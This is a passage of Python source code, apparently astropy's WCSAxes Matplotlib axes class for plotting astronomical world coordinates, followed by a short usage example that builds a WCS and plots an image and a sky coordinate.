the native ticks, labels, and gridlines. Instead, ``WCSAxes.draw`` renders
ersatz ticks, labels, and gridlines by explicitly calling the functions
``CoordinateHelper._draw_ticks``, ``CoordinateHelper._draw_grid``, etc.
This hack would not be necessary if ``WCSAxes`` drew ticks, tick labels,
    and gridlines in the standard way."""
def draw(self, renderer, *args, **kwargs):
self.axes.draw_wcsaxes(renderer)
class WCSAxes(Axes):
"""
The main axes class that can be used to show world coordinates from a WCS.
Parameters
----------
fig : `~matplotlib.figure.Figure`
The figure to add the axes to
rect : list
The position of the axes in the figure in relative units. Should be
given as ``[left, bottom, width, height]``.
wcs : :class:`~astropy.wcs.WCS`, optional
The WCS for the data. If this is specified, ``transform`` cannot be
specified.
transform : `~matplotlib.transforms.Transform`, optional
The transform for the data. If this is specified, ``wcs`` cannot be
specified.
coord_meta : dict, optional
A dictionary providing additional metadata when ``transform`` is
specified. This should include the keys ``type``, ``wrap``, and
``unit``. Each of these should be a list with as many items as the
dimension of the WCS. The ``type`` entries should be one of
``longitude``, ``latitude``, or ``scalar``, the ``wrap`` entries should
give, for the longitude, the angle at which the coordinate wraps (and
`None` otherwise), and the ``unit`` should give the unit of the
coordinates as :class:`~astropy.units.Unit` instances. This can
optionally also include a ``format_unit`` entry giving the units to use
for the tick labels (if not specified, this defaults to ``unit``).
transData : `~matplotlib.transforms.Transform`, optional
Can be used to override the default data -> pixel mapping.
slices : tuple, optional
For WCS transformations with more than two dimensions, we need to
choose which dimensions are being shown in the 2D image. The slice
should contain one ``x`` entry, one ``y`` entry, and the rest of the
values should be integers indicating the slice through the data. The
order of the items in the slice should be the same as the order of the
dimensions in the :class:`~astropy.wcs.WCS`, and the opposite of the
order of the dimensions in Numpy. For example, ``(50, 'x', 'y')`` means
that the first WCS dimension (last Numpy dimension) will be sliced at
an index of 50, the second WCS and Numpy dimension will be shown on the
x axis, and the final WCS dimension (first Numpy dimension) will be
shown on the y-axis (and therefore the data will be plotted using
``data[:, :, 50].transpose()``)
frame_class : type, optional
The class for the frame, which should be a subclass of
:class:`~astropy.visualization.wcsaxes.frame.BaseFrame`. The default is to use a
:class:`~astropy.visualization.wcsaxes.frame.RectangularFrame`
"""
def __init__(self, fig, rect, wcs=None, transform=None, coord_meta=None,
transData=None, slices=None, frame_class=None,
**kwargs):
"""
"""
super().__init__(fig, rect, **kwargs)
self._bboxes = []
if frame_class is not None:
self.frame_class = frame_class
elif (wcs is not None and (wcs.pixel_n_dim == 1 or
(slices is not None and 'y' not in slices))):
self.frame_class = RectangularFrame1D
else:
self.frame_class = RectangularFrame
        if transData is not None:
# User wants to override the transform for the final
# data->pixel mapping
self.transData = transData
self.reset_wcs(wcs=wcs, slices=slices, transform=transform, coord_meta=coord_meta)
self._hide_parent_artists()
self.format_coord = self._display_world_coords
self._display_coords_index = 0
fig.canvas.mpl_connect('key_press_event', self._set_cursor_prefs)
self.patch = self.coords.frame.patch
self._wcsaxesartist = _WCSAxesArtist()
self.add_artist(self._wcsaxesartist)
self._drawn = False
def _display_world_coords(self, x, y):
if not self._drawn:
return ""
if self._display_coords_index == -1:
return f"{x} {y} (pixel)"
pixel = np.array([x, y])
coords = self._all_coords[self._display_coords_index]
world = coords._transform.transform(np.array([pixel]))[0]
coord_strings = []
for idx, coord in enumerate(coords):
if coord.coord_index is not None:
coord_strings.append(coord.format_coord(world[coord.coord_index], format='ascii'))
coord_string = ' '.join(coord_strings)
if self._display_coords_index == 0:
system = "world"
else:
system = f"world, overlay {self._display_coords_index}"
coord_string = f"{coord_string} ({system})"
return coord_string
def _set_cursor_prefs(self, event, **kwargs):
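        # Pressing 'w' cycles the status-bar readout through the main world
        # coordinates, then each overlay, and finally (-1) raw pixel
        # coordinates, as interpreted by _display_world_coords above.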
if event.key == 'w':
self._display_coords_index += 1
if self._display_coords_index + 1 > len(self._all_coords):
self._display_coords_index = -1
def _hide_parent_artists(self):
# Turn off spines and current axes
for s in self.spines.values():
s.set_visible(False)
self.xaxis.set_visible(False)
if self.frame_class is not RectangularFrame1D:
self.yaxis.set_visible(False)
# We now overload ``imshow`` because we need to make sure that origin is
# set to ``lower`` for all images, which means that we need to flip RGB
# images.
def imshow(self, X, *args, **kwargs):
"""
Wrapper to Matplotlib's :meth:`~matplotlib.axes.Axes.imshow`.
If an RGB image is passed as a PIL object, it will be flipped
vertically and ``origin`` will be set to ``lower``, since WCS
transformations - like FITS files - assume that the origin is the lower
left pixel of the image (whereas RGB images have the origin in the top
left).
All arguments are passed to :meth:`~matplotlib.axes.Axes.imshow`.
"""
origin = kwargs.pop('origin', 'lower')
# plt.imshow passes origin as None, which we should default to lower.
if origin is None:
origin = 'lower'
elif origin == 'upper':
raise ValueError("Cannot use images with origin='upper' in WCSAxes.")
# To check whether the image is a PIL image we can check if the data
# has a 'getpixel' attribute - this is what Matplotlib's AxesImage does
try:
from PIL.Image import Image, FLIP_TOP_BOTTOM
except ImportError:
# We don't need to worry since PIL is not installed, so user cannot
# have passed RGB image.
pass
else:
if isinstance(X, Image) or hasattr(X, 'getpixel'):
X = X.transpose(FLIP_TOP_BOTTOM)
return super().imshow(X, *args, origin=origin, **kwargs)
def contour(self, *args, **kwargs):
"""
Plot contours.
This is a custom implementation of :meth:`~matplotlib.axes.Axes.contour`
which applies the transform (if specified) to all contours in one go for
performance rather than to each contour line individually. All
positional and keyword arguments are the same as for
:meth:`~matplotlib.axes.Axes.contour`.
"""
# In Matplotlib, when calling contour() with a transform, each
# individual path in the contour map is transformed separately. However,
# this is much too slow for us since each call to the transforms results
# in an Astropy coordinate transformation, which has a non-negligible
# overhead - therefore a better approach is to override contour(), call
# the Matplotlib one with no transform, then apply the transform in one
# go to all the segments that make up the contour map.
transform = kwargs.pop('transform', None)
cset = super().contour(*args, **kwargs)
if transform is not None:
# The transform passed to self.contour will normally include
# a transData component at the end, but we can remove that since
# we are already working in data space.
transform = transform - self.transData
transform_contour_set_inplace(cset, transform)
return cset
def contourf(self, *args, **kwargs):
"""
Plot filled contours.
This is a custom implementation of :meth:`~matplotlib.axes.Axes.contourf`
which applies the transform (if specified) to all contours in one go for
performance rather than to each contour line individually. All
positional and keyword arguments are the same as for
:meth:`~matplotlib.axes.Axes.contourf`.
"""
# See notes for contour above.
transform = kwargs.pop('transform', None)
cset = super().contourf(*args, **kwargs)
if transform is not None:
# The transform passed to self.contour will normally include
# a transData component at the end, but we can remove that since
# we are already working in data space.
transform = transform - self.transData
transform_contour_set_inplace(cset, transform)
return cset
def plot_coord(self, *args, **kwargs):
"""
Plot `~astropy.coordinates.SkyCoord` or
`~astropy.coordinates.BaseCoordinateFrame` objects onto the axes.
The first argument to
:meth:`~astropy.visualization.wcsaxes.WCSAxes.plot_coord` should be a
coordinate, which will then be converted to the first two parameters to
`matplotlib.axes.Axes.plot`. All other arguments are the same as
`matplotlib.axes.Axes.plot`. If not specified a ``transform`` keyword
argument will be created based on the coordinate.
Parameters
----------
coordinate : `~astropy.coordinates.SkyCoord` or `~astropy.coordinates.BaseCoordinateFrame`
The coordinate object to plot on the axes. This is converted to the
first two arguments to `matplotlib.axes.Axes.plot`.
See Also
--------
matplotlib.axes.Axes.plot : This method is called from this function with all arguments passed to it.
"""
if isinstance(args[0], (SkyCoord, BaseCoordinateFrame)):
# Extract the frame from the first argument.
frame0 = args[0]
if isinstance(frame0, SkyCoord):
frame0 = frame0.frame
native_frame = self._transform_pixel2world.frame_out
# Transform to the native frame of the plot
frame0 = frame0.transform_to(native_frame)
plot_data = []
for coord in self.coords:
if coord.coord_type == 'longitude':
plot_data.append(frame0.spherical.lon.to_value(u.deg))
elif coord.coord_type == 'latitude':
plot_data.append(frame0.spherical.lat.to_value(u.deg))
else:
raise NotImplementedError("Coordinates cannot be plotted with this "
"method because the WCS does not represent longitude/latitude.")
if 'transform' in kwargs.keys():
raise TypeError("The 'transform' keyword argument is not allowed,"
" as it is automatically determined by the input coordinate frame.")
transform = self.get_transform(native_frame)
kwargs.update({'transform': transform})
args = tuple(plot_data) + args[1:]
return super().plot(*args, **kwargs)
def reset_wcs(self, wcs=None, slices=None, transform=None, coord_meta=None):
"""
Reset the current Axes, to use a new WCS object.
"""
# Here determine all the coordinate axes that should be shown.
if wcs is None and transform is None:
self.wcs = IDENTITY
else:
# We now force call 'set', which ensures the WCS object is
# consistent, which will only be important if the WCS has been set
# by hand. For example if the user sets a celestial WCS by hand and
# forgets to set the units, WCS.wcs.set() will do this.
if wcs is not None:
# Check if the WCS object is an instance of `astropy.wcs.WCS`
# This check is necessary as only `astropy.wcs.WCS` supports
# wcs.set() method
if isinstance(wcs, WCS):
wcs.wcs.set()
if isinstance(wcs, BaseHighLevelWCS):
wcs = wcs.low_level_wcs
self.wcs = wcs
# If we are making a new WCS, we need to preserve the path object since
# it may already be used by objects that have been plotted, and we need
# to continue updating it. CoordinatesMap will create a new frame
# instance, but we can tell that instance to keep using the old path.
if hasattr(self, 'coords'):
previous_frame = {'path': self.coords.frame._path,
'color': self.coords.frame.get_color(),
'linewidth': self.coords.frame.get_linewidth()}
else:
previous_frame = {'path': None}
if self.wcs is not None:
transform, coord_meta = transform_coord_meta_from_wcs(self.wcs, self.frame_class, slices=slices)
self.coords = CoordinatesMap(self,
transform=transform,
coord_meta=coord_meta,
frame_class=self.frame_class,
previous_frame_path=previous_frame['path'])
self._transform_pixel2world = transform
if previous_frame['path'] is not None:
self.coords.frame.set_color(previous_frame['color'])
self.coords.frame.set_linewidth(previous_frame['linewidth'])
self._all_coords = [self.coords]
# Common default settings for Rectangular Frame
for ind, pos in enumerate(coord_meta.get('default_axislabel_position', ['b', 'l'])):
self.coords[ind].set_axislabel_position(pos)
for ind, pos in enumerate(coord_meta.get('default_ticklabel_position', ['b', 'l'])):
self.coords[ind].set_ticklabel_position(pos)
for ind, pos in enumerate(coord_meta.get('default_ticks_position', ['bltr', 'bltr'])):
self.coords[ind].set_ticks_position(pos)
if rcParams['axes.grid']:
self.grid()
def draw_wcsaxes(self, renderer):
if not self.axison:
return
# Here need to find out range of all coordinates, and update range for
# each coordinate axis. For now, just assume it covers the whole sky.
self._bboxes = []
# This generates a structure like [coords][axis] = [...]
ticklabels_bbox = defaultdict(partial(defaultdict, list))
ticks_locs = defaultdict(partial(defaultdict, list))
visible_ticks = []
for coords in self._all_coords:
coords.frame.update()
for coord in coords:
coord._draw_grid(renderer)
for coords in self._all_coords:
for coord in coords:
coord._draw_ticks(renderer, bboxes=self._bboxes,
ticklabels_bbox=ticklabels_bbox[coord],
ticks_locs=ticks_locs[coord])
visible_ticks.extend(coord.ticklabels.get_visible_axes())
for coords in self._all_coords:
for coord in coords:
coord._draw_axislabels(renderer, bboxes=self._bboxes,
ticklabels_bbox=ticklabels_bbox,
ticks_locs=ticks_locs[coord],
visible_ticks=visible_ticks)
self.coords.frame.draw(renderer)
def draw(self, renderer, inframe=False):
# In Axes.draw, the following code can result in the xlim and ylim
# values changing, so we need to force call this here to make sure that
# the limits are correct before we update the patch.
locator = self.get_axes_locator()
if locator:
pos = locator(self, renderer)
self.apply_aspect(pos)
else:
self.apply_aspect()
if self._axisbelow is True:
self._wcsaxesartist.set_zorder(0.5)
elif self._axisbelow is False:
self._wcsaxesartist.set_zorder(2.5)
else:
# 'line': above patches, below lines
self._wcsaxesartist.set_zorder(1.5)
        # We need to make sure that the frame path is up to date
self.coords.frame._update_patch_path()
super().draw(renderer, inframe=inframe)
self._drawn = True
# MATPLOTLIB_LT_30: The ``kwargs.pop('label', None)`` is to ensure
# compatibility with Matplotlib 2.x (which has label) and 3.x (which has
# xlabel). While these are meant to be a single positional argument,
# Matplotlib internally sometimes specifies e.g. set_xlabel(xlabel=...).
def set_xlabel(self, xlabel=None, labelpad=1, **kwargs):
if xlabel is None:
xlabel = kwargs.pop('label', None)
if xlabel is None:
raise TypeError("set_xlabel() missing 1 required positional argument: 'xlabel'")
for coord in self.coords:
if 'b' in coord.axislabels.get_visible_axes():
coord.set_axislabel(xlabel, minpad=labelpad, **kwargs)
break
def set_ylabel(self, ylabel=None, labelpad=1, **kwargs):
if ylabel is None:
ylabel = kwargs.pop('label', None)
if ylabel is None:
raise TypeError("set_ylabel() missing 1 required positional argument: 'ylabel'")
if self.frame_class is RectangularFrame1D:
return super().set_ylabel(ylabel, labelpad=labelpad, **kwargs)
for coord in self.coords:
if 'l' in coord.axislabels.get_visible_axes():
coord.set_axislabel(ylabel, minpad=labelpad, **kwargs)
break
def get_xlabel(self):
for coord in self.coords:
if 'b' in coord.axislabels.get_visible_axes():
return coord.get_axislabel()
def get_ylabel(self):
if self.frame_class is RectangularFrame1D:
return super().get_ylabel()
for coord in self.coords:
if 'l' in coord.axislabels.get_visible_axes():
return coord.get_axislabel()
def get_coords_overlay(self, frame, coord_meta=None):
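        # Build a second CoordinatesMap for the given frame and register it in
        # self._all_coords; by convention its axis and tick labels are placed
        # on the top/right edges so they do not collide with the main
        # coordinate labels.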
# Here we can't use get_transform because that deals with
# pixel-to-pixel transformations when passing a WCS object.
if isinstance(frame, WCS):
transform, coord_meta = transform_coord_meta_from_wcs(frame, self.frame_class)
else:
transform = self._get_transform_no_transdata(frame)
if coord_meta is None:
coord_meta = get_coord_meta(frame)
coords = CoordinatesMap(self, transform=transform,
coord_meta=coord_meta,
frame_class=self.frame_class)
self._all_coords.append(coords)
# Common settings for overlay
coords[0].set_axislabel_position('t')
coords[1].set_axislabel_position('r')
coords[0].set_ticklabel_position('t')
coords[1].set_ticklabel_position('r')
self.overlay_coords = coords
return coords
def get_transform(self, frame):
"""
Return a transform from the specified frame to display coordinates.
This does not include the transData transformation
Parameters
----------
frame : :class:`~astropy.wcs.WCS` or :class:`~matplotlib.transforms.Transform` or str
The ``frame`` parameter can have several possible types:
* :class:`~astropy.wcs.WCS` instance: assumed to be a
transformation from pixel to world coordinates, where the
world coordinates are the same as those in the WCS
transformation used for this ``WCSAxes`` instance. This is
used for example to show contours, since this involves
plotting an array in pixel coordinates that are not the
final data coordinate and have to be transformed to the
common world coordinate system first.
* :class:`~matplotlib.transforms.Transform` instance: it is
assumed to be a transform to the world coordinates that are
part of the WCS used to instantiate this ``WCSAxes``
instance.
* ``'pixel'`` or ``'world'``: return a transformation that
allows users to plot in pixel/data coordinates (essentially
an identity transform) and ``world`` (the default
world-to-pixel transformation used to instantiate the
``WCSAxes`` instance).
* ``'fk5'`` or ``'galactic'``: return a transformation from
the specified frame to the pixel/data coordinates.
* :class:`~astropy.coordinates.BaseCoordinateFrame` instance.
"""
return self._get_transform_no_transdata(frame).inverted() + self.transData
def _get_transform_no_transdata(self, frame):
"""
Return a transform from data to the specified frame
"""
if isinstance(frame, WCS):
transform, coord_meta = transform_coord_meta_from_wcs(frame, self.frame_class)
transform_world2pixel = transform.inverted()
if self._transform_pixel2world.frame_out == transform_world2pixel.frame_in:
return self._transform_pixel2world + transform_world2pixel
else:
return (self._transform_pixel2world +
CoordinateTransform(self._transform_pixel2world.frame_out,
transform_world2pixel.frame_in) +
transform_world2pixel)
elif frame == 'pixel':
return Affine2D()
elif isinstance(frame, Transform):
return self._transform_pixel2world + frame
else:
if frame == 'world':
return self._transform_pixel2world
else:
coordinate_transform = CoordinateTransform(self._transform_pixel2world.frame_out, frame)
if coordinate_transform.same_frames:
return self._transform_pixel2world
else:
return self._transform_pixel2world + coordinate_transform
def get_tightbbox(self, renderer, *args, **kwargs):
# FIXME: we should determine what to do with the extra arguments here.
# Note that the expected signature of this method is different in
# Matplotlib 3.x compared to 2.x.
if not self.get_visible():
return
bb = [b for b in self._bboxes if b and (b.width != 0 or b.height != 0)]
if bb:
_bbox = Bbox.union(bb)
return _bbox
else:
return self.get_window_extent(renderer)
def grid(self, b=None, axis='both', *, which='major', **kwargs):
"""
Plot gridlines for both coordinates.
Standard matplotlib appearance options (color, alpha, etc.) can be
passed as keyword arguments. This behaves like `matplotlib.axes.Axes`
except that if no arguments are specified, the grid is shown rather
than toggled.
Parameters
----------
b : bool
Whether to show the gridlines.
"""
if not hasattr(self, 'coords'):
return
if which != 'major':
raise NotImplementedError('Plotting the grid for the minor ticks is '
'not supported.')
if axis == 'both':
self.coords.grid(draw_grid=b, **kwargs)
elif axis == 'x':
self.coords[0].grid(draw_grid=b, **kwargs)
elif axis == 'y':
self.coords[1].grid(draw_grid=b, **kwargs)
else:
raise ValueError('axis should be one of x/y/both')
def tick_params(self, axis='both', **kwargs):
"""
Method to set the tick and tick label parameters in the same way as the
:meth:`~matplotlib.axes.Axes.tick_params` method in Matplotlib.
This is provided for convenience, but the recommended API is to use
:meth:`~astropy.visualization.wcsaxes.CoordinateHelper.set_ticks`,
:meth:`~astropy.visualization.wcsaxes.CoordinateHelper.set_ticklabel`,
:meth:`~astropy.visualization.wcsaxes.CoordinateHelper.set_ticks_position`,
:meth:`~astropy.visualization.wcsaxes.CoordinateHelper.set_ticklabel_position`,
and :meth:`~astropy.visualization.wcsaxes.CoordinateHelper.grid`.
Parameters
----------
axis : int or str, optional
Which axis to apply the parameters to. This defaults to 'both'
but this can also be set to an `int` or `str` that refers to the
axis to apply it to, following the valid values that can index
            ``ax.coords``. Note that ``'x'`` and ``'y'`` are also accepted in
the case of rectangular axes.
which : {'both', 'major', 'minor'}, optional
            Which ticks to apply the settings to. By default, settings are
applied to both major and minor ticks. Note that if ``'minor'`` is
specified, only the length of the ticks can be set currently.
direction : {'in', 'out'}, optional
Puts ticks inside the axes, or outside the axes.
length : float, optional
Tick length in points.
width : float, optional
Tick width in points.
color : color, optional
Tick color (accepts any valid Matplotlib color)
pad : float, optional
Distance in points between tick and label.
labelsize : float or str, optional
Tick label font size in points or as a string (e.g., 'large').
labelcolor : color, optional
Tick label color (accepts any valid Matplotlib color)
colors : color, optional
Changes the tick color and the label color to the same value
(accepts any valid Matplotlib color).
bottom, top, left, right : bool, optional
Where to draw the ticks. Note that this can only be given if a
specific coordinate is specified via the ``axis`` argument, and it
will not work correctly if the frame is not rectangular.
labelbottom, labeltop, labelleft, labelright : bool, optional
Where to draw the tick labels. Note that this can only be given if a
specific coordinate is specified via the ``axis`` argument, and it
will not work correctly if the frame is not rectangular.
grid_color : color, optional
The color of the grid lines (accepts any valid Matplotlib color).
grid_alpha : float, optional
Transparency of grid lines: 0 (transparent) to 1 (opaque).
grid_linewidth : float, optional
Width of grid lines in points.
grid_linestyle : str, optional
The style of the grid lines (accepts any valid Matplotlib line
style).
"""
if not hasattr(self, 'coords'):
# Axes haven't been fully initialized yet, so just ignore, as
# Axes.__init__ calls this method
return
if axis == 'both':
for pos in ('bottom', 'left', 'top', 'right'):
if pos in kwargs:
raise ValueError(f"Cannot specify {pos}= when axis='both'")
if 'label' + pos in kwargs:
raise ValueError(f"Cannot specify label{pos}= when axis='both'")
for coord in self.coords:
coord.tick_params(**kwargs)
elif axis in self.coords:
self.coords[axis].tick_params(**kwargs)
elif axis in ('x', 'y') and self.frame_class is RectangularFrame:
spine = 'b' if axis == 'x' else 'l'
for coord in self.coords:
if spine in coord.axislabels.get_visible_axes():
coord.tick_params(**kwargs)
# In the following, we put the generated subplot class in a temporary class and
# we then inherit it - if we don't do this, the generated class appears to
# belong in matplotlib, not in WCSAxes, from the API's point of view.
class WCSAxesSubplot(subplot_class_factory(WCSAxes)):
"""
    A subplot class for WCSAxes.
"""
pass
|
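# A hedged usage sketch (not part of the module above): constructing a WCSAxes
# through the standard Matplotlib projection mechanism and overplotting a
# SkyCoord with plot_coord. The WCS header values below are hypothetical.
import matplotlib.pyplot as plt
import numpy as np
import astropy.units as u
from astropy.coordinates import SkyCoord
from astropy.wcs import WCS

wcs = WCS(naxis=2)
wcs.wcs.ctype = ['RA---TAN', 'DEC--TAN']
wcs.wcs.crval = [30.0, 45.0]      # reference point in world coordinates (deg)
wcs.wcs.crpix = [50.0, 50.0]      # reference pixel
wcs.wcs.cdelt = [-0.01, 0.01]     # pixel scale (deg/pixel)

fig = plt.figure()
# Passing a WCS as the projection yields a WCSAxesSubplot instance.
ax = fig.add_subplot(1, 1, 1, projection=wcs)
ax.imshow(np.random.random((100, 100)), origin='lower')
ax.grid(color='white', ls='dotted')
ax.plot_coord(SkyCoord(30.2 * u.deg, 45.1 * u.deg), 'o')
fig.savefig('wcsaxes_example.png')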